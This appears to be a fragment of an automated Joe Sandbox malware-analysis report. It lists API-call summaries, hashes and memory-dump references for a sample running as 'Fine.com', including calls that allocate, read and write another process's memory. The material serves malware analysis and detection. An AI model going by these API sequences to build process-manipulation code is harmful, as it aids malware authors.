                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6014fb102f2b9eac608861677f23dd619dac8400cc1c348556e9c38591a1b10f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE01DD76B227157FB3216AFA5C4CC7BFA6DDEC2B613140119FC08C2281DEA08C1185B0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(0000000A,?,?,001FF64E,001F545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00203170
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 002031A5
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 002031CC
                                                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 002031D9
                                                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 002031E2
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b0ac9fa2961d8b9aece0b0d90926817aaf31e7ca5b0db47ac04045cab07e854c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 525941ebce4540e6a232936756ba6f07f725dcf7c8a3e096636d9cd9c6fe4302
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0ac9fa2961d8b9aece0b0d90926817aaf31e7ca5b0db47ac04045cab07e854c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6401D672674B016BD712AA34AC8DD2A555D9FC93717200425F91D922D3EEA18A355920
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00230831,80070057,?,?,?,00230C4E), ref: 0023091B
                                                                                                                                                                                                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00230831,80070057,?,?), ref: 00230936
                                                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00230831,80070057,?,?), ref: 00230944
                                                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00230831,80070057,?), ref: 00230954
                                                                                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00230831,80070057,?,?), ref: 00230960
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0023F2AE
                                                                                                                                                                                                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 0023F2BC
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 0023F2C4
                                                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0023F2CE
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32 ref: 0023F30A
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00231A60
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,002314E7,?,?,?), ref: 00231A6C
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002314E7,?,?,?), ref: 00231A7B
                                                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002314E7,?,?,?), ref: 00231A82
                                                                                                                                                                                                                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00231A99
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 842720411-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00231916
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00231922
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00231931
                                                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00231938
                                                                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0023194E
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 175159a7fdcd6759e05087f753fa52e8fe9ad720e66cab1825231504ab8d8cba
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f9b429e0de46aec08478040701d65467179c9dcc9a7fede48d3453c88a4aaf7e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 175159a7fdcd6759e05087f753fa52e8fe9ad720e66cab1825231504ab8d8cba
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FDF0967560031ABBDB210F65EC5DF573B6DEF897A0F114454FA45D7250CAB1DC20CA60
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00231976
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00231982
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00231991
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00231998
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002319AE
APIs
• CloseHandle.KERNEL32(?,?,?,?,00240B24,?,00243D41,?,00000001,00213AF4,?), ref: 00240CCB
• CloseHandle.KERNEL32(?,?,?,?,00240B24,?,00243D41,?,00000001,00213AF4,?), ref: 00240CD8
• CloseHandle.KERNEL32(?,?,?,?,00240B24,?,00243D41,?,00000001,00213AF4,?), ref: 00240CE5
• CloseHandle.KERNEL32(?,?,?,?,00240B24,?,00243D41,?,00000001,00213AF4,?), ref: 00240CF2
• CloseHandle.KERNEL32(?,?,?,?,00240B24,?,00243D41,?,00000001,00213AF4,?), ref: 00240CFF
• CloseHandle.KERNEL32(?,?,?,?,00240B24,?,00243D41,?,00000001,00213AF4,?), ref: 00240D0C
APIs
• GetDlgItem.USER32(?,000003E9), ref: 002365BF
• GetWindowTextW.USER32(00000000,?,00000100), ref: 002365D6
• MessageBeep.USER32(00000000), ref: 002365EE
• KillTimer.USER32(?,0000040A), ref: 0023660A
• EndDialog.USER32(?,00000001), ref: 00236624
APIs
• _free.LIBCMT ref: 0020DAD2
  • Part of subcall function 00202D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0020DB51,002A1DC4,00000000,002A1DC4,00000000,?,0020DB78,002A1DC4,00000007,002A1DC4,?,0020DF75,002A1DC4), ref: 00202D4E
  • Part of subcall function 00202D38: GetLastError.KERNEL32(002A1DC4,?,0020DB51,002A1DC4,00000000,002A1DC4,00000000,?,0020DB78,002A1DC4,00000007,002A1DC4,?,0020DF75,002A1DC4,002A1DC4), ref: 00202D60
• _free.LIBCMT ref: 0020DAE4
• _free.LIBCMT ref: 0020DAF6
• _free.LIBCMT ref: 0020DB08
• _free.LIBCMT ref: 0020DB1A
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020262E
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00202D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0020DB51,002A1DC4,00000000,002A1DC4,00000000,?,0020DB78,002A1DC4,00000007,002A1DC4,?,0020DF75,002A1DC4), ref: 00202D4E
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00202D38: GetLastError.KERNEL32(002A1DC4,?,0020DB51,002A1DC4,00000000,002A1DC4,00000000,?,0020DB78,002A1DC4,00000007,002A1DC4,?,0020DF75,002A1DC4,002A1DC4), ref: 00202D60
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00202640
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00202653
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00202664
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00202675
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: __freea$_free
                                                                                                                                                                                                                                                                                                                            • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                                                            • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002441FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,002552EE,?,?,00000035,?), ref: 00244229
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002441FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,002552EE,?,?,00000035,?), ref: 00244239
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00255419
                                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0025550E
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 002555CD
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                                                                                                                                                                                                                                                                            • String ID: bn#
                                                                                                                                                                                                                                                                                                                            • API String ID: 2854431205-3976982791
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 001DD253
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                                            • String ID: t5*$t5*$t5*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1385522511-59120502
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8e350e6b6dc36fac9bfb42d72644ba511b59ff21891d53b586440dab726ccdb4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ce4fc65370ece3f268707746e3322a9c51248d8a42676ed875863410a9507a20
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e350e6b6dc36fac9bfb42d72644ba511b59ff21891d53b586440dab726ccdb4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A915BB5A00206DFCB18CF58E4906AABBF1FF99310F25855AE9459B340D731EE82CF90
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: CALLARGARRAY$bn#
                                                                                                                                                                                                                                                                                                                            • API String ID: 157775604-2243500937
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e85ef3911912a3db0cbbbde8a2be1965f0792cc8e5cad1cb1466da4ed9a82692
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7dc8ba8b935c2b1b4389631920d016ca8c7c43dea75dd4bb84a084743cd3707a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e85ef3911912a3db0cbbbde8a2be1965f0792cc8e5cad1cb1466da4ed9a82692
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA41B071E102099FCB00DFA5C8899BEBBB5FF59325F50402AE806E7251D7719D96CB90
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00232B1D,?,?,00000034,00000800,?,00000034), ref: 0023BDF4
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002330AD
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00232B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0023BDBF
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0023BD1C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00232AE1,00000034,?,?,00001004,00000000,00000000), ref: 0023BD2C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00232AE1,00000034,?,?,00001004,00000000,00000000), ref: 0023BD42
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0023311A
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00233167
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                                                            • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b0986c7e0c2de0314669bb3db22e3879625776876663d3d6b41152fb5d5c80f0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: be38f60008a57e2724c09ae89e010f73fb24552aae18dd1097ea64bed6677e9f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0986c7e0c2de0314669bb3db22e3879625776876663d3d6b41152fb5d5c80f0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C14119B2A0021CAEDB11DFA4CD85ADEBBB8EF49700F004095FA55B7180DB706F95DBA1
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\424372\Fine.com,00000104), ref: 00201AD9
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00201BA4
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00201BAE
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\AppData\Local\Temp\424372\Fine.com
• API String ID: 2506810119-950796607
• Opcode ID: 8f4e924184dfc5e515a6ce8e4e12bccd9aa04d00b21576394eabc30267c9772e
• Instruction ID: 4ddf99dce7da8b9c36ed44a1c0061164927e20cef1d3f4b0b400e6470968bac0
• Opcode Fuzzy Hash: 8f4e924184dfc5e515a6ce8e4e12bccd9aa04d00b21576394eabc30267c9772e
• Instruction Fuzzy Hash: BF316F71A10319EBCB21DF99DC85D9EBBFCEF85714B1041AAF80497292E7B04E64DB90
APIs
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0023CBB1
• DeleteMenu.USER32(?,00000007,00000000), ref: 0023CBF7
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002A29C0,00BA5E90), ref: 0023CC40
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• API String ID: 135850232-4108050209
• Opcode ID: ff33fe2ce4933f8a2131fd6be88c6c56128d266b812ba7a27a534065bb5a4a55
• Instruction ID: 9253319546418c9852d408e0379ef2d268bfe9f0f4a29605c8bed9ce4ea4e5a1
• Opcode Fuzzy Hash: ff33fe2ce4933f8a2131fd6be88c6c56128d266b812ba7a27a534065bb5a4a55
• Instruction Fuzzy Hash: 8F41C3B12143029FD720DF24D885B1ABBE8EF84714F244A1EF9A5A72D1D770E924CB66
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0026DCD0,00000000,?,?,?,?), ref: 00264F48
• GetWindowLongW.USER32 ref: 00264F65
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00264F75
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: dc825c0555f964d43b54b9d38e2f2a53feb55ccf09e4020915d0d2f292bbedd9
• Instruction ID: 660fd2883782b61ceea6a46eee270953292ded1b13a68777944588446fb7b917
• Opcode Fuzzy Hash: dc825c0555f964d43b54b9d38e2f2a53feb55ccf09e4020915d0d2f292bbedd9
• Instruction Fuzzy Hash: D631B03162020AAFDF219E38DC45BDA77A9EB19338F204715F9B5A21E0C770ECA09B50
APIs
  • Part of subcall function 00253DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00253AD4,?,?), ref: 00253DD5
• inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00253AD7
